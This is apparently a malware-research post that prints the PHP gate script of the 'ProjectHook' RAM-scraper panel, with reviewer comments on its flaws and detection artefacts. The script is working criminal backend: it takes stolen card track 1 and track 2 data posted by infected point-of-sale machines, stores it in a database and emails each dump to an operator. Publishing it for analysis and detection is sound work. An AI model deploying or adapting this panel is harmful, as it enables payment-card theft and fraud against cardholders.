ProjectHook RAM scraper seems to be alive (thx to xylitol)
I could not find any malware sample, but the source code of the new panel is attached.
new gate rxcx.php:
<?php
//$email = "XXXX@XXXX.XXX";
// Destination mailbox for the per-submission notification sent by mail() at the
// end of this script (the address appears to be redacted in the posted copy).
$email = "XXXX@XXXX.XX";
// Headers for that notification: HTML body, ISO-8859-1 charset, and a fixed
// From: address that does not depend on the server it runs on.
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: dump@db.com\r\n";
// db.php is not part of this post; presumably it opens the MySQL link that the
// parameterless mysql_query() calls below use by default — confirm against the
// panel's db.php if it becomes available.
include "db.php";
/**
 * Returns the address recorded for the sender of the current request.
 *
 * Precedence is Client-IP header, then X-Forwarded-For, then the socket peer
 * (REMOTE_ADDR); a header value is used only if it validates as an IP address.
 * Because the first two are ordinary request headers, the returned value is
 * whatever the sender chose to put there — the `ip` column this feeds should
 * not be treated as a reliable victim address when analysing the panel's data.
 *
 * @return string
 */
function getUserIP()
{
    // `@` hides the undefined-index notice when a header is absent; the value is then null.
    $clientHeader = @$_SERVER['HTTP_CLIENT_IP'];
    $forwardedHeader = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    // Read unconditionally, as the original does, so a missing REMOTE_ADDR
    // surfaces the same way regardless of which branch wins.
    $socketPeer = $_SERVER['REMOTE_ADDR'];

    if (filter_var($clientHeader, FILTER_VALIDATE_IP)) {
        return $clientHeader;
    }
    if (filter_var($forwardedHeader, FILTER_VALIDATE_IP)) {
        return $forwardedHeader;
    }
    return $socketPeer;
}
// Sender address as resolved by getUserIP(). That helper honours the Client-IP
// and X-Forwarded-For request headers, so the `ip` value stored below is
// sender-controlled rather than a verified origin.
$user_ip = getUserIP();
// Initialize ExtendedAddslash() function for every $_POST variable
// NOTE(review): the comment above is stale — no escaping function is defined
// or called anywhere in this file; each field is taken from the request
// verbatim. These six POST parameter names (BYTE, DATA, ID, PROC, T1, T2) are
// the observable request shape of this gate and the natural basis for a
// network detection signature.
$byte = $_POST['BYTE'];
$data = $_POST['DATA'];
$id = $_POST['ID'];
$proc = $_POST['PROC'];
$track1 = $_POST['T1']; // presumably magnetic-stripe track 1 — inferred from the name only
$track2 = $_POST['T2']; // presumably track 2 — inferred from the name only
// search submission ID
// The lookup key and, below, every stored value are interpolated directly into
// the SQL text via the legacy mysql_* API; no prepared statements are used.
$query = "SELECT * FROM `hook` WHERE `submission_id` = '$id'";
$sqlsearch = mysql_query($query);
$resultcount = mysql_numrows($sqlsearch);
if ($resultcount > 0) {
// Known submission ID: overwrite the existing row in place. On failure the raw
// MySQL error text is written to the HTTP response by die().
mysql_query("UPDATE `hook` SET
`ip` = '$user_ip',
`t1` = '$track1',
`t2` = '$track2',
`data` = '$data',
`proc` = '$proc',
`byte` = '$byte'
WHERE `submission_id` = '$id'")
or die(mysql_error());
} else {
// First sighting of this submission ID: create the row. The INSERT writes the
// identifier to a column named `id`, whereas the SELECT and UPDATE key on
// `submission_id`; whether these are the same column cannot be determined from
// this file — check the panel's schema before relying on the dedup behaviour.
mysql_query("INSERT INTO `hook` (ip, data, id,
byte, proc, t1, t2)
VALUES ('$user_ip', '$data', '$id',
'$byte', '$proc', '$track1', '$track2') ")
or die(mysql_error());
}
// Every accepted submission is also forwarded to $email, with all fields in both
// the subject and the HTML body. Outbound mail carrying the "New Data:" subject
// prefix and the From: address set in $headers is a second artefact worth
// alerting on when hunting for this panel.
mail($email, "New Data: $user_ip : $data : $proc : $track1 : $track2", "ip: $user_ip<br>track1: $track1<br>track2: $track2<br>data: $data<br>proc: $proc", $headers);
?>